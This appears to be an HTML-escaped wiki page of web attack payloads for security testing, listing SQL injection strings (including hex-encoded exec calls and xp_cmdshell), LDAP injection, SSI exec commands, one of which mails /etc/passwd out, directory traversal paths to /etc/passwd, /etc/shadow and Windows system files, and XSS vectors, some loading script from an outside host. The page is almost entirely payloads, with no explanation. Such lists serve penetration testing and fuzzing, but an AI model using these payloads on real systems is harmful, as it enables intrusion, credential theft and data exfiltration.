a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
